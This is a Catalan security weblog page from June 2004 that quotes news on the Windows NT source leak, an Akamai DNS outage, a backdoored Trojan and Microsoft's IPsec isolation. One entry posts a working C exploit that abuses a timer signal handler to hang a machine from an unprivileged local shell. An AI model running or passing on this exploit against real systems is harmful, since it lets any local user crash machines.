Enllaços
Contingut actualitzat
Categories
Contingut antic
(ja no s'actualitza)
Versions anteriors
d'aquesta pàgina
Arxiu
|
|
 |
dimarts, 15 / juny / 2004 |
[Crypto-Gram] Microsoft Source Code Leak. Bruce Schneier analitza la resposta de Microsoft davant la divulgació de part del codi font de Windows NT.
The Windows NT code that was leaked consisted of all of NT 4.0 Service Pack 3 -- more than 27,000 files. The Windows 2000 code only contained select portions of the source code, but did include the PKI module.
(...)
A company that truly understands data security would respond by admitting and trying to fix the security breach that caused the leak, and by proactively poring over the released code to quickly patch as many of the inevitable bugs as possible. They would realize that the hackers have the code and might use it, and not prevent the good guys from helping defend themselves.
|
23:19 (# Enllaç permanent) ()
|
|
[Slashdot] Akamai DNS Outage Messes up Net... i és que avui en dia, si Akamai deixa de funcionar ens quedem sense Google, Microsoft, Yahoo!, Apple, les eleccions europees (bé, vist l'èxit d'aquestes no cal que Akamai deixi de funcionar). Ho expliquen a Incidents.org:
Starting at around 8:30 am EDT (12:30 UTC), a number of sources started to report a widespread Akamai DNS issue. Large web sites, which use Akamai for its DNS service, did no longer resolve. Affected sites were Yahoo, Google, Microsoft, Fedex, Xerox, Apple and likely many others.
Akamai és una empresa que ofereix serveis de balanceig del tràfic i localització geogràfica, adreçat a empreses amb una notable presència a Internet, permetent la distribució de contingut de forma distribuïda arreu del món. Akamai afirma que els seus servidors gestionen un 15% del tràfic global d'Internet.
A Netcraft indiquen, citant fonts de l'empresa, que l'origen del problema ha estat un atac distribuït de denegació de servei contra els seus servidors de noms.
Entre els serveis afectats en destaca els serveis d'actualització de diversos programes antivirus (com Symantec i Trendmicro).
Molts dels afectats pel problema han pogut restaurar el servei en poca estona, canviant els servidors de noms associats als dominis amb màquines de la seva pròpia infraestructura.
|
22:58 (# Enllaç permanent) ()
|
|
Aquest exploit penjarà la màquina. Ha de ser executat per un usuari local amb accés via shell. No cal ser root.#include <'sys/time.h'>
#include <'signal.h'>
#include <'unistd.h'>
static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0 " : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0 " : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
|
07:55 (# Enllaç permanent) ()
|
|
[The Register] Backdoor program gets backdoored. Com dèia en Morpheus, «el destí, sembla que no està carent de certa ironia».
The author of a free Trojan horse program favored by amateur computer intruders found himself with some explaining to do to the underground last month, after his users discovered he'd slipped a secret backdoor password into his popular malware, potentially allowing him to re-hack compromised hosts.
The program in question is Optix Pro (Backdoor.OptixPro.12), a full-featured backdoor that allows an intruder to easily control a compromised Windows machine remotely, from accessing or changing files, to capturing a user's keystrokes or spying on a victim through their webcam. Though some features could make Optix Pro usable as a legitimate remote management tool, others are clearly tailored to the underground, including a function that disables a machine's anti-virus and firewall software. The program has been downloaded nearly 270,000 times, according to a counter on the distribution site.
|
07:37 (# Enllaç permanent) ()
|
|
Microsoft explica com ha implementat la separació de dominis utilitzant IPSec:
Situation
As part of its “defense in depth” security strategy, Microsoft IT wanted to isolate their managed computers from unmanaged (and untrusted) computers. If trusted computers could be made to ignore requests from these untrusted computers, they could be kept more secure.
Solution
Microsoft IT chose IP Security (IPsec), a standards-based approach to authenticating network traffic. With IPsec, the corporate domains can be isolated, segmenting all computers into trusted and untrusted groups.
Benefits
• Allows creation of logical secure network segments behind the corporate network perimeter.
• Works independently of network hardware, computers, and other infrastructure, providing end-to-end security to the edges of the network.
• Can be deployed and managed centrally through the use of Group Policy.
Products & Technologies
• IP Security protocols (ESP, IKE)
• Windows Server 2003
• Windows XP Professional (SP 1)
• Windows 2000 (SP3)
• Group Policy
• Active Directory
• Public Key Infrastructure and Certificate Authority (CA)
|
01:03 (# Enllaç permanent) ()
|
|
[The New York Times] Gambling on Voting és una fantàstica comparativa dels requeriments de seguretat, fiabilitat i fortalesa davant el frau que imposa el govern dels Estats Units a les màquines escurabutxaques i a les màquines utilitzades per a les votacions electròniques. Quins requeriments seran els més exigents?
|
00:35 (# Enllaç permanent) ()
|
|
© Copyright 2003-2004 Xavier Caballe.  . El contingut d'aquest weblog és responsabilitat única i exclusivament del seu autor i no té cap relació amb les seves activitats professionals.
|
|
|
Des d'avui hi ha possibilitat de 
